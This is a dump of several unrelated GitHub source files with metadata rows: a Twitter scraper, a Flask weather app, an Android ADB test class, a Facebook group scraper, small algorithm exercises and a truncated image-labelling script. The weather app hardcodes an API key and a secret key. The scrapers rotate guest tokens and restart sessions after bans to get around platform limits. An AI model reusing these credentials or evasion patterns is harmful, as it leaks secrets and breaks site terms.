self.user_ids = dict()
self.user_names = dict()
@staticmethod
def get_emojis(text):
return re.findall(BlueBird.emoji_regex, text)
@staticmethod
def get_tagged_html(text):
return re.sub(BlueBird.img_regex, f' {BlueBird.emoji_flag} ', text)
@staticmethod
def insert_emojis(emojis, text):
for emoji in emojis:
text = text.replace(f' {BlueBird.emoji_flag} ', emoji, 1)
text = text.replace(f' {BlueBird.emoji_flag} ', '')
return text
@staticmethod
def post_process_text(text):
text = text.replace('…', '')
text = re.sub(r'\s+', ' ', text)
return text
@staticmethod
def get_processed_text(html_content):
emojis = BlueBird.get_emojis(html_content)
tagged_html = BlueBird.get_tagged_html(html_content)
tagged_text = document_fromstring(tagged_html).text_content()
tagged_text_emojis = BlueBird.insert_emojis(emojis, tagged_text)
text = BlueBird.post_process_text(tagged_text_emojis)
return text.strip()
@staticmethod
def _get_auth_header(guest_token=None):
headers = {'authorization': f'Bearer {BlueBird.ACCESS_TOKEN}'}
if guest_token is not None:
headers['x-guest-token'] = guest_token
return headers
@staticmethod
def _get_guest_token():
url = 'https://api.twitter.com/1.1/guest/activate.json'
headers = BlueBird._get_auth_header()
response = requests.post(url, headers=headers)
return response.json()['guest_token']
def _get_first_guest_token(self):
return self.guest_tokens[0]
def _rotate_guest_token(self):
self.guest_tokens.append(self._pop_guest_token())
def _pop_guest_token(self):
return self.guest_tokens.pop(0)
def _request_guest_token(self):
guest_token = self._get_guest_token()
self.guest_tokens.append(guest_token)
def _get_api_response(self, url):
first_guest_token = None
valid_guest_token_found = False
data = None
while not valid_guest_token_found:
guest_token = self._get_first_guest_token()
if first_guest_token is None:
first_guest_token = guest_token
elif first_guest_token == guest_token:
self._request_guest_token()
headers = self._get_auth_header(guest_token=guest_token)
response = requests.get(url, headers=headers)
data = response.json()
if 'errors' in data:
error_message = data['errors'][0]['message']
if error_message == 'Forbidden.':
self._pop_guest_token()
elif error_message == 'Bad request.' or error_message == "User not found.":
return
else:
self._rotate_guest_token()
else:
valid_guest_token_found = True
return data
def get_user_by_name(self, username):
url = f'https://api.twitter.com/1.1/users/show.json?screen_name={username}'
return self._get_api_response(url)
def get_user_by_id(self, user_id):
url = f'https://api.twitter.com/1.1/users/show.json?id={user_id}'
return self._get_api_response(url)
def get_user_id(self, username):
if username not in self.user_ids:
user_id = self.get_user_by_name(username)['id']
self.user_ids[username] = user_id
return self.user_ids[username]
def get_screen_name(self, user_id):
if user_id not in self.user_names:
screen_name = self.get_user_by_id(user_id)['screen_name']
self.user_names[user_id] = screen_name
return self.user_names[user_id]
@staticmethod
def _update_url_with_params(url, params):
first = True
for key, value in params.items():
symbol = '&'
if first:
symbol = '?'
first = False
url += f'{symbol}{key}={value}'
return url
@staticmethod
def _encode_query(query) -> str:
encoded_query = ''
since = None
if 'since' in query:
since = query['since']
until = None
if 'until' in query:
until = query['until']
near = None
if 'near' in query:
near = query['near']
lang = None
if 'lang' in query:
lang = query['lang']
fields = []
if 'fields' in query:
fields = query['fields']
for field in fields:
target = None
if 'target' in field:
target = field['target']
items = field['items']
match = None
if 'match' in field:
match = field['match']
exact = False
if 'exact' in field:
exact = field['exact']
if exact:
marginal_query = '"' + '" "'.join(items) + '"'
else:
target = None
if 'target' in field:
target = field['target']
if target == 'from':
marginal_query = 'from:' + ' from:'.join(items)
elif target == 'to':
marginal_query = 'to:' + ' to:'.join(items)
elif target == 'hashtag':
marginal_query = '#' + ' #'.join(items)
elif target == 'mention':
marginal_query = '@' + ' @'.join(items)
else:
marginal_query = ' '.join(items)
if match == 'any':
marginal_query = ' OR '.join(marginal_query.split())
elif match == 'none':
marginal_query = '-' + ' -'.join(marginal_query.split())
if match == 'any':
encoded_query += ' (' + marginal_query + ')'
else:
encoded_query += ' ' + marginal_query
if since is not None:
encoded_query += f' since:{since}'
if until is not None:
encoded_query += f' until:{until}'
if near is not None:
encoded_query += f' near:"{near[0]}" within:{near[1]}mi'
encoded_query = encoded_query.strip()
encoded_query = quote(encoded_query)
if lang is not None:
encoded_query += f'&l={lang}'
print(f'[Test URL] https://twitter.com/search?f=tweets&vertical=default&q={encoded_query}')
return encoded_query
def _get_tweets_web(self, url, deep, sleep_time, query_type, min_tweets):
seen_tweets = 0
if query_type == 'user':
position = ''
elif query_type == 'search':
position = '&max_position=-1'
# Generalizar con params como los otros
if not '?' in url:
url += '?'
else:
url += '&'
url += 'include_available_features=1&include_entities=1'
has_more_items = True
while has_more_items:
new_url = f'{url}{position}&reset_error_state=false'
done = False
while not done:
try:
content = HttpHelper.get_json_response(new_url)
done = True
except Exception:
continue
items_html = content['items_html']
try:
root = document_fromstring(items_html)
except ParserError:
continue
has_more_items = content['has_more_items']
if not deep:
has_more_items = False
if 'min_position' in content:
position = f"&max_position={content['min_position']}"
else:
continue
tweets_data = root.xpath("//div[@data-tweet-id]")
tweets_content = root.xpath("//p[@lang]")
tweets_timestamps = root.xpath("//span[@data-time-ms]")
for i, tweet_data in enumerate(tweets_data):
seen_tweets += 1
body_html = tostring(tweets_content[i], encoding='unicode')
body = BlueBird.get_processed_text(body_html)
tweet_id = tweet_data.attrib['data-tweet-id']
timestamp = tweets_timestamps[i].attrib['data-time-ms']
language = tweets_content[i].attrib['lang']
name = tweet_data.attrib['data-name']
screen_name = tweet_data.attrib['data-screen-name']
author_id = tweet_data.attrib['data-user-id']
tweet = {
'user': {
'name': name,
'screen_name': screen_name,
'id': author_id
},
'id': tweet_id,
'language': language,
'timestamp': timestamp,
'text': body,
'url': f'https://twitter.com/{screen_name}/status/{tweet_id}',
}
yield tweet
# Restart if the min_tweets target wasn't achieved
if not has_more_items and seen_tweets < min_tweets:
seen_tweets = 0
has_more_items = True
if query_type == 'user':
position = ''
elif query_type == 'search':
position = '&max_position=-1'
continue
if deep:
time.sleep(sleep_time)
def _search_web(self, query, deep, count, sleep_time, min_tweets):
encoded_query = BlueBird._encode_query(query)
base_url = f'https://twitter.com/i/search/timeline?f=tweets&vertical=news&q={encoded_query}&src=typd'
yield from self._get_tweets_web(base_url, deep, sleep_time, 'search', min_tweets)
def _user_timeline_web(self, username, deep, count, include_replies, sleep_time, min_tweets):
base_url = f'https://twitter.com/i/profiles/show/{username}/timeline/tweets'
yield from self._get_tweets_web(base_url, deep, sleep_time, 'user', min_tweets)
def _get_tweets_2(self, url, deep, sleep_time, min_tweets):
seen_tweets = 0
cursor = None
done = False
while not done:
new_url = url
if cursor is not None:
new_url += f'&cursor={cursor}'
response = self._get_api_response(new_url)
if response is None:
break
tweets = response['globalObjects']['tweets']
done = True
for tweet_id, tweet in tweets.items():
seen_tweets += 1
tweet['id'] = tweet_id
done = False
yield tweet
try:
cursor = response['timeline']['instructions'][0]['addEntries']\
['entries'][-1]['content']['operation']['cursor']['value']
except (KeyError, IndexError):
try:
cursor = response['timeline']['instructions'][-1]['replaceEntry']\
['entry']['content']['operation']['cursor']['value']
except KeyError:
done = True
# Restart if the min_tweets target wasn't achieved
if not done and seen_tweets < min_tweets:
seen_tweets = 0
cursor = None
done = False
continue
def _search_2(self, query, deep, count, sleep_time, min_tweets):
if count > 200:
count = 200
encoded_query = BlueBird._encode_query(query)
base_url = 'https://api.twitter.com/2/search/adaptive.json'
params = {
'q': encoded_query,
'count': count,
'sorted_by_time': 'true',
'tweet_mode': 'extended'
}
url = BlueBird._update_url_with_params(base_url, params)
print(url)
yield from self._get_tweets_2(url, deep, sleep_time, min_tweets)
def _user_timeline_2(self, username, deep, count, include_replies, sleep_time, min_tweets):
user_id = self.get_user_id(username)
if count > 200:
count = 200
if include_replies:
include_tweet_replies = 'true'
else:
include_tweet_replies = 'false'
url = f'https://api.twitter.com/2/timeline/profile/{user_id}.json'
params = {
'count': count,
'include_entities': 'false',
'tweet_mode': 'extended',
'include_reply_count': 0,
'include_user_entities': 'false',
'send_error_codes': 'false',
'include_tweet_replies': include_tweet_replies
}
url = BlueBird._update_url_with_params(url, params)
yield from self._get_tweets_2(url, deep, sleep_time, min_tweets)
def _get_tweets_1_1(self, url, deep, sleep_time, min_tweets):
seen_tweets = 0
max_id = None
done = False
while not done:
new_url = url
if max_id is not None:
new_url += f'&max_id={max_id}'
tweets = None
attempts = 10
retry = True
while attempts and retry and not done:
attempts -= 1
response = self._get_api_response(new_url)
# Search
if 'statuses' in response:
tweets = response['statuses']
else:
tweets = response
retry = True
for tweet in tweets:
retry = False
seen_tweets += 1
if max_id == tweet['id']:
done = True
else:
max_id = tweet['id']
yield tweet
if not tweets:
done = True
# Restart if the min_tweets target wasn't achieved
if done and seen_tweets < min_tweets:
done = False
continue
if not deep:
done = True
else:
time.sleep(sleep_time)
def _search_1_1(self, query, deep, count, sleep_time, min_tweets):
if count > 100:
count = 100
encoded_query = BlueBird._encode_query(query)
base_url = 'https://api.twitter.com/1.1/search/tweets.json'
params = {
'q': encoded_query,
'count': count,
'result_type': 'recent',
'include_entities': 'false'
}
url = BlueBird._update_url_with_params(base_url, params)
yield from self._get_tweets_1_1(url, deep, sleep_time, min_tweets)
def _user_timeline_1_1(self, username, deep, count, include_replies, sleep_time, min_tweets):
if count > 200:
count = 200
if include_replies:
exclude_tweet_replies = 'false'
else:
exclude_tweet_replies = 'true'
base_url = f'https://api.twitter.com/1.1/statuses/user_timeline.json'
params = {
'screen_name': username,
'trim_user': 'true',
'exclude_replies': exclude_tweet_replies,
'count': count
}
url = BlueBird._update_url_with_params(base_url, params)
yield from self._get_tweets_1_1(url, deep, sleep_time, min_tweets)
def search(self, query, deep=False, count=100, sleep_time=0, min_tweets=0, mode=API_2):
return getattr(self, f'_search_{mode}')(query, deep, count, sleep_time, min_tweets)
def user_timeline(self,
username,
deep=False,
count=200,
include_replies=True,
sleep_time=0,
min_tweets=0,
mode=API_2):
return getattr(self, f'_user_timeline_{mode}')(username, deep, count, include_replies,
sleep_time, min_tweets)
def stream(self, query, sleep_time=0, mode=API_2):
known_tweets = CircularOrderedSet(50)
while True:
try:
for tweet in self.search(query, mode=mode):
if tweet['id'] not in known_tweets:
known_tweets.add(tweet['id'])
yield tweet
except Exception:
pass
time.sleep(sleep_time)
@staticmethod
def get_list_members(username, list_name):
has_more_items = True
min_position = -1
while has_more_items:
url = f'https://twitter.com/{username}/lists/{list_name}/members/timeline?include_available_features=1&include_entities=1&max_position={min_position}&reset_error_state=false'
content = HttpHelper.get_json_response(url)
items_html = content['items_html']
try:
root = document_fromstring(items_html)
except ParserError:
continue
has_more_items = content['has_more_items']
min_position = content['min_position']
account_elements = root.xpath(
"//div[contains(@class, 'account') and @data-screen-name]")
for account in account_elements:
name = account.attrib['data-name']
screen_name = account.attrib['data-screen-name']
author_id = account.attrib['data-user-id']
yield {'name': name, 'screen_name': screen_name, 'id': author_id}
@staticmethod
def get_followings(username):
return BlueBird.get_followx(username, target='followings')
@staticmethod
def get_followers(username):
return BlueBird.get_followx(username, target='followers')
@staticmethod
def get_followx(username, target):
has_more_items = True
min_position = 0
while has_more_items:
url = f'https://mobile.twitter.com/{username}/{target}?lang=en'
if min_position:
url += f'&cursor={min_position}'
content = HttpHelper.get_html_response(url)
try:
root = document_fromstring(bytes(content, encoding='utf-8'))
except ParserError:
continue
account_elements = root.xpath("//td[contains(@class, 'screenname')]/a[@name]")
for account in account_elements:
screen_name = account.attrib['name']
yield screen_name
try:
min_position = root.xpath(
"//div[@class='w-button-more']/a")[0].attrib['href'].split('cursor=')[1]
except IndexError:
has_more_items = False
@staticmethod
def get_hashtags(place):
raise NotImplementedError
@staticmethod
def get_profile(username):
# TODO url = f'https://mobile.twitter.com/{username}'
raise NotImplementedError
@staticmethod
def get_likes_no(tweet):
raise NotImplementedError
@staticmethod
def get_retweets_no(tweet):
raise NotImplementedError
@staticmethod
def get_replies_no(tweet):
raise NotImplementedError
| labteral/bluebird | bluebird/scraper.py | scraper.py | py | 20,410 | python | en | code | 45 | github-code | 36 | [
{
"api_name": "orderedset.OrderedSet",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "re.compile",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_nu... |
26765982477 | import requests
from flask import Flask, render_template, request, redirect, url_for, flash
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['DEBUG'] = True
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///weather.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'qwertyuiopsecretkey'
db = SQLAlchemy(app)
class City(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(50), nullable=False)
# app.config['DEBUG'] = True
key = 'c9f1f34212b6ce232a81ca55ffc01e4f'
unit = 'metric'
url = 'http://api.openweathermap.org/data/2.5/weather?q={}&units={}&appid={}'
def get_weather_data(city):
r = requests.get(url.format(city, unit, key)).json()
return r
@app.route('/')
def index_get():
cities = City.query.all()
weather_data = []
for city in cities:
r = get_weather_data(city.name)
# print(r)
#
weather = {
'city': city.name,
'temperature': round(r['main']['temp']),
'description': str(r['weather'][0]['description']).title(),
'icon': r['weather'][0]['icon'],
'humidity':r['main']['humidity'],
'wind': r['wind']['speed']
}
weather_data.append(weather)
return render_template('index.html', weather_data=weather_data)
@app.route('/', methods=['POST'])
def index_post():
err_msg = ''
new_city = request.form.get('city').strip().lower()
res = get_weather_data(new_city)
if res['cod'] == 200 and new_city:
city_exists = City.query.filter(City.name.ilike(f"%{new_city}%")).first()
if not city_exists:
city_to_add = City(name=new_city.title())
db.session.add(city_to_add)
db.session.commit()
else:
err_msg = 'City Already Exists'
else:
err_msg = 'City does not exist in the world !'
if err_msg:
flash(err_msg, 'error')
else:
flash('City Added Successfully !', 'success')
return redirect(url_for('index_get'))
@app.route('/delete/<name>')
def delete_city(name):
city = City.query.filter_by(name=name).first()
db.session.delete(city)
db.session.commit()
flash('Successfully Deleted {}'.format(city.name),'success')
return redirect(url_for('index_get'))
if __name__ == "__main__":
app.run(debug=True)
| thenileshunde/weatherly | app.py | app.py | py | 2,509 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "flask.render_temp... |
34848563515 | """1.1 Implement an algorithm to determine if a string has all unique
characters. What if you cannot use additional data structures?"""
def is_unique(input_string):
"""determines if a string has all unique characters"""
from collections import Counter
counter = Counter(input_string)
for char, values in counter.items():
if values > 1:
return False
return True
def test_is_unique():
assert is_unique("asdfg") == True
assert is_unique("asssdffasdf") == False
def is_unique_without_counter(input_string):
"""Check if a string has all unique characters *without* using additional
data structures"""
input_string = sorted(input_string)
last_char = None
for char in input_string:
if char == last_char:
return False
last_char = char
return True
def test_is_unique_without_counter():
assert is_unique_without_counter("asdfg") == True
assert is_unique_without_counter("asssdffasdf") == False
| stonecharioteer/blog | source/code/books/ctci/01_arrays_and_strings/ex_1x1_unique.py | ex_1x1_unique.py | py | 1,001 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 9,
"usage_type": "call"
}
] |
6762090600 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
# Importing the dataset
dataset = pd.read_csv('Ads_CTR_Optimisation.csv')
#Implementing the UCB(from scratch.!!)
#we need to consider this number for each ad i. We're going to create a vector that will contain each of those members of selections of each ad i. So we will set this variable to vector of size d and we will initialize all components of this vector to zero.
d=10
numbers_of_selections=[0]*d
#This will create a vector of size d with zeros in it and we are doing this because of course at first round each version of the ad isn't being selected at,so no of times each version of the ad gets selected is of cousre 0
N=10000
ads_selected=[]
#sum of rewards of ad i upto round n, so we are going to set it as vector of decomponentsN=10000
sums_of_rewards=[0]*d
total_reward=0
for n in range(0, N):
ad = 0
max_upper_bound = 0
for i in range(0, d):
if (numbers_of_selections[i] > 0):
average_reward = sums_of_rewards[i] / numbers_of_selections[i]
delta_i = math.sqrt(3/2 * math.log(n + 1) / numbers_of_selections[i])
upper_bound = average_reward + delta_i
else:
upper_bound = 1e400
if upper_bound > max_upper_bound:
max_upper_bound = upper_bound
ad = i
ads_selected.append(ad)
numbers_of_selections[ad] = numbers_of_selections[ad] + 1
reward = dataset.values[n, ad]
sums_of_rewards[ad] = sums_of_rewards[ad] + reward
total_reward = total_reward + reward
#Visualising The Results
plt.hist(ads_selected)
plt.title('Hostogram: ADS Selections')
plt.xlabel("Ads")
plt.ylabel('No of Times Each add was selected')
plt.show()
| raja17021998/Exciting-Machine-Learning-Journey-on-Python-and-R | Part 6 - Reinforcement Learning/Section 32 - Upper Confidence Bound (UCB)/UCB/upper_confidence_bound_wd.py | upper_confidence_bound_wd.py | py | 1,845 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "math.log",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.hist",
"line_... |
5487070944 | # from ADBInterface import
from Common import CommonFunction, AssertResult, ADBCommand, DealAlert
from Common.Log import MyLog, OutPutText
import re
from Conf.Config import Config
from ADBInterface import simplify_interface_code
from ADBInterface.Qualcomm import QualcommChip
import time
import datetime
meta_alert = DealAlert.AlertData()
log = MyLog()
my_text = OutPutText()
sim_code = simplify_interface_code.simplify_code()
assertData = AssertResult.AssertOutput()
commData = CommonFunction.CommonData()
adbData = ADBCommand.ADBManage()
class QualcommAndroid11(QualcommChip.QualcommChipInterface):
def __init__(self):
pass
def reboot_dev(self):
commData.adb_restart_devices()
self.open_root_auth()
commData.adb_reboot()
def reboot_dev_only(self):
commData.adb_restart_devices()
def open_root_auth(self):
act = commData.adb_root()
ret = assertData.assert_is_true(act)
act = commData.adb_remout()
ret = assertData.assert_is_true(act)
# commData.adb_reboot()
# 调试先不开
# self.reboot_dev_only()
def get_volume_offset(self):
my_text.write_text("alarm_speaker: [1, 7]")
my_text.write_text("music_speaker: [0, 15]")
my_text.write_text("ring_speaker: [0, 15]")
my_text.write_text("volume_voice_earpiece: [1, 5]")
def get_volume_info(self, stream):
cmd = "settings get system %s" % str(stream)
res = commData.send_shell_cmd(cmd)
meg = "当前的音量信息为: %s" % res
sim_code.print_log(meg)
my_text.write_text(meg)
# def get_cur_volume_value(self, stream):
# cmd = "settings get system %s" % str(stream)
# return sim_code.str_replace(commData.send_shell_cmd(cmd))
#
# def set_volume_value(self, stream, value):
# cmd = "settings put system %s %s" % (stream, str(value))
# sim_code.simplify_no_return(cmd)
#
# def check_volume_value(self, stream, value):
# act = sim_code.str_replace(self.get_cur_volume_value(stream))
# if str(value) != act:
# sim_code.print_err_log("音量设置失败!!!")
# assert False, "音量设置失败!!!"
# sim_code.print_log("音量设置成功!!!")
def sys_brightness_setting(self):
cmd = "dumpsys power | grep mScreenBrightnessSetting"
sim_code.simplify_txt_file(cmd, "系统亮度系数:")
def hand_type_check_default_brightness(self):
cmd = "dumpsys power | grep mScreenBrightnessSettingDefault"
def_res = commData.send_shell_cmd(cmd)
def_value_list = re.findall(r'\d+\.?\d*', def_res)
def_value = def_value_list[0]
cur_value = self.cur_brightness()
# if def_valule in self.cur_brightness():
if int(def_value) <= 149 and int(cur_value) <= 149:
log.info("默认亮度不超过90%")
my_text.write_text(def_value)
my_text.write_text(cur_value)
else:
err = "@@@默认亮度超过90%, 请手动检查"
log.error(err)
my_text.write_text(err)
my_text.write_text(def_value)
# else:
# err = "系统默认的亮度和当前的亮度不一致"
# log.error(err)
# assert False, err
return int(def_value)
def modify_brightness_time_out(self, time_out):
if time_out.strip() == "永不":
value = str(2147483647)
self.deal_brigthness_time_out(time_out, value)
elif time_out.strip() == "15sec":
value = str(15000)
self.deal_brigthness_time_out(time_out, value)
elif time_out.strip() == "1min":
value = str(60000)
self.deal_brigthness_time_out(time_out, value)
elif time_out.strip() == "5min":
value = str(300000)
self.deal_brigthness_time_out(time_out, value)
def hand_type_modify_brightness(self, value=102):
# 0:10%, 102:82%, 255:100%
cmd = "settings put system screen_brightness %s" % str(value)
text1 = ''
if value == 0:
text1 = "亮度已经修改为0了, 检查设置是否为0%, 请观察亮度变化有没有黑屏 "
elif value == 102:
text1 = "亮度已经修改为默认亮度了, 请观察亮度变化"
elif value == 255:
text1 = "亮度已经修改为100%了, 检查设置是否为100%, 请观察亮度变化"
meta_alert.getAlert(text=text1)
# act = self.cur_brightness()
sim_code.simplify_no_return(cmd)
# print(type(self.cur_brightness()))
assertData.assert_text_exit(str(value), self.cur_brightness())
def test_for_screen_timeout(self):
self.set_screen_sleep("2147483647")
self.reboot_dev()
self.screen_sleep()
# self.screen_wake()
self.unlock_screen()
self.unlock_screen()
my_text.write_text("##########设置1min后进入休眠################")
my_text.write_text("开始计算======")
cmd = "dumpsys power | grep \"Display Power: state=\""
self.set_screen_sleep("60000")
my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
my_text.write_text(str(0) + "秒后 " + commData.send_shell_cmd(cmd))
time.sleep(52)
my_text.write_text(str(52) + "秒后 " + commData.send_shell_cmd(cmd))
time.sleep(2)
my_text.write_text(str(54) + "秒后 " + commData.send_shell_cmd(cmd))
time.sleep(1)
my_text.write_text(str(55) + "秒后 " + commData.send_shell_cmd(cmd))
time.sleep(1)
my_text.write_text(str(56) + "秒后 " + commData.send_shell_cmd(cmd))
time.sleep(1)
my_text.write_text(str(57) + "秒后 " + commData.send_shell_cmd(cmd))
time.sleep(1)
my_text.write_text(str(58) + "秒后 " + commData.send_shell_cmd(cmd))
time.sleep(1)
my_text.write_text(str(59) + "秒后 " + commData.send_shell_cmd(cmd))
my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
assert "OFF" in self.get_screen_status(), "@@@1min中后进入休眠失败,请检查!!!"
self.screen_wake()
self.unlock_screen()
my_text.write_text("##########设置15sec后进入休眠################")
my_text.write_text("开始计算======")
self.set_screen_sleep("15000")
my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
for i in range(1, 15):
time.sleep(1)
my_text.write_text(str(i) + "秒后 " + commData.send_shell_cmd(cmd))
my_text.write_text("当前网络时间:" + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f"))
assert "OFF" in self.get_screen_status()
my_text.write_text("##########设置永不休眠休眠################")
self.screen_wake()
self.unlock_screen()
self.set_screen_sleep("2147483647")
| wmm98/Telpo_TPS469_Automation | ADBInterface/Qualcomm/Android_Versions/Qualcomm_Android_11.py | Qualcomm_Android_11.py | py | 7,148 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "Common.DealAlert.AlertData",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "Common.DealAlert",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "Common.Log.MyLog",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "Common.L... |
23992990502 | '''
286. Walls and Gates
https://leetcode.com/problems/walls-and-gates/
'''
from typing import List
from collections import deque
# The key is to recognize that if we search from gates to empty rooms
# We are guaranteed to find the shortest path by using BFS
class Solution:
def wallsAndGates(self, rooms: List[List[int]]) -> None:
"""
Do not return anything, modify rooms in-place instead.
"""
# this is similar to 01-matrix
# our distances are already marked as INF
# start BFS from 0 values, and update distance
R = len(rooms)
if R == 0:
return
C = len(rooms[0])
# specify neighbor coordinates
dr = [-1,1,0,0]
dc = [0,0,-1,1]
# push all 0 cell coordinates onto the queue
# we'll be going from gates to empty rooms
queue = deque()
for r in range(R):
for c in range(C):
if rooms[r][c] == 0:
queue.append((r,c))
# bfs
while queue:
r, c = queue.popleft()
for i in range(4):
nr = r + dr[i]
nc = c + dc[i]
# the next cell must be at most 1 step away from gates
# as the neighbouring cell, so if not, upgrade and push back to the queue
if nr>=0 and nc>=0 and nr<R and nc<C:
if rooms[nr][nc] > rooms[r][c] + 1:
rooms[nr][nc] = rooms[r][c] + 1
queue.append((nr,nc)) | asset311/leetcode | bfs/walls_and_gates.py | walls_and_gates.py | py | 1,621 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.List",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "collections.deque",
"line_number": 34,
"usage_type": "call"
}
] |
23843055382 | from django.urls import path
from .views import Frontpage, Shop, Signup, Login, MyAccount, EditMyAccount
from product.views import ProductDetailView
from django.contrib.auth.views import LogoutView
urlpatterns = [
path('', Frontpage.as_view(), name='frontpage'),
path('signup/', Signup.as_view(), name='signup'),
path('login/', Login.as_view(), name='login'),
path('myaccount', MyAccount.as_view(), name='myaccount'),
path('myaccount/edit', EditMyAccount.as_view(), name='edit_myaccount'),
path('logout/', LogoutView.as_view(), name='logout'),
path('shop/', Shop.as_view(), name='shop'),
# path('product/<int:pk>/', ProductDetailView.as_view(), name='product'),
path('shop/<slug:slug>/', ProductDetailView.as_view(), name='product'),
]
| DenisVasil/Django-Tailwind-Shop | core/urls.py | urls.py | py | 774 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "views.Frontpage.as_view",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "views.Frontpage",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.urls.pat... |
74362482985 | from group_class import FacebookGroups
from scraper import scrape
from db_handler import init_mongo
from datetime import datetime
from rich import print
import config
import time
import random
import os
import sys
# Sleep for the desired time and restart for the sake of establishing new requests session
def sleep_and_restart(time_off):
time.sleep(time_off)
os.execl(sys.executable, 'python', __file__, *sys.argv[1:])
# Running instances, the main function determines which group will be scraped and when.
# When a group scraping terminates, main will decide what happens next, depending on the cause
def main():
init_mongo()
list_size = len(FacebookGroups.reg_list)
i = 0
dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
print(f"\n[green]{dt_string} Scraper initiated")
while True:
print(f"\n[green]Group Num: {i+1}\nGroup name: {FacebookGroups.reg_list[i % list_size].name}")
kwargs = FacebookGroups.reg_list[i % list_size].__dict__
state = scrape(**kwargs)
dt_string = datetime.now().strftime("%d/%m/%Y %H:%M:%S")
if state == 0:
print(f"\n[green]{dt_string} Breaking after reaching max number of posts per batch. "
f"Scraping of next batch will begin in {str(config.BREAK_TIME/60/60)} hrs")
FacebookGroups.batch_posts = 0
sleep_and_restart(config.BREAK_TIME)
elif state == 1:
print(f"\n[green]{dt_string} Scraping of {FacebookGroups.reg_list[i % list_size].name} terminated after it's"
f" gone through {FacebookGroups.reg_list[i % len(FacebookGroups.reg_list)].max_known} known posts")
elif state == 2:
print(f"\n[red]{dt_string} Temporarily banned by Facebook. "
f"Scraping of next batch will begin in {str(config.BAN_SLEEP/60/60)} hrs")
sleep_and_restart(config.BAN_SLEEP)
i += 1
if i % list_size == 0:
print(f"\n[green]{dt_string} Breaking after covering all groups. "
f"Scraping of next batch will begin in {str(config.BREAK_TIME/60/60)} hrs")
sleep_and_restart(config.BREAK_TIME)
'''
#### START HERE #####
Add group instances, mandatory attributes are group name and group id
Unless specified, all other attributes will be set as configured in config.py
'''
if __name__ == '__main__':
# These are example public groups:
jackson_heights = FacebookGroups('Jackson Heights', 35851988964)
ilsington = FacebookGroups('Ilsington', 743308202528264)
uppereast = FacebookGroups('Upper East Side', 'uppereastside35andolder')
main()
| itamark87/Project-Ekron | main.py | main.py | py | 2,648 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "time.sleep",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "os.execl",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "sys.executable",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number":... |
13069484239 |
import os
import numpy as np
from PIL import Image, ImageDraw, ImageFont
from scipy.ndimage import label
from config import cfg
import labels
def benchmark_vis(iou_ar, fn):
pred_pgt_ar = np.zeros_like(iou_ar)
structure = np.ones((3, 3), dtype=int)
segment_ar = label(iou_ar, structure)[0]
for idx in np.unique(segment_ar):
if idx > 0:
segment = np.where(segment_ar == idx)
if len(segment[0]) >= cfg.MIN_ERROR_SIZE:
pred_pgt_ar[segment] = iou_ar[segment]
inf_mask_suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
inf_ar = np.asarray(Image.open(os.path.join(cfg.INFERENCE_OUTPUT_DIR, fn + "." + inf_mask_suffix)), dtype="uint8")
result = np.zeros(pred_pgt_ar.shape + (3,), dtype='uint8')
result[:,:,0] = pred_pgt_ar
result[:,:,1] = inf_ar
Image.fromarray(result).save(os.path.join(cfg.BENCHMARK_PROPOSAL_VIS_DIR, fn + "_proposals.png"))
def label_error_vis(fn):
diff_mask = np.load(os.path.join(cfg.DIFF_DIR, fn + "_diff_map.npy"))
img_suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
gt_mask = np.array(Image.open(os.path.join(cfg.GT_MASKS_DIR, fn + "." + img_suffix)))
structure = np.ones((3, 3), dtype=int)
error_segments = label(diff_mask, structure)[0]
for idx in np.unique(error_segments):
if idx > 0:
segment = np.where(error_segments == idx)
if len(segment[0]) < cfg.MIN_ERROR_SIZE:
diff_mask[segment] = 0
diff_mask[diff_mask==1] = gt_mask[diff_mask==1]
Image.fromarray(diff_mask).save(os.path.join(cfg.ERROR_DIR, fn + "_label_errors." + img_suffix))
def proposal_vis(iou, fn, seg_id, cls_id):
"""Visualization of one potential label error in image fn"""
inf_mask_suffix = os.listdir(cfg.GT_MASKS_DIR)[0].split(".")[-1]
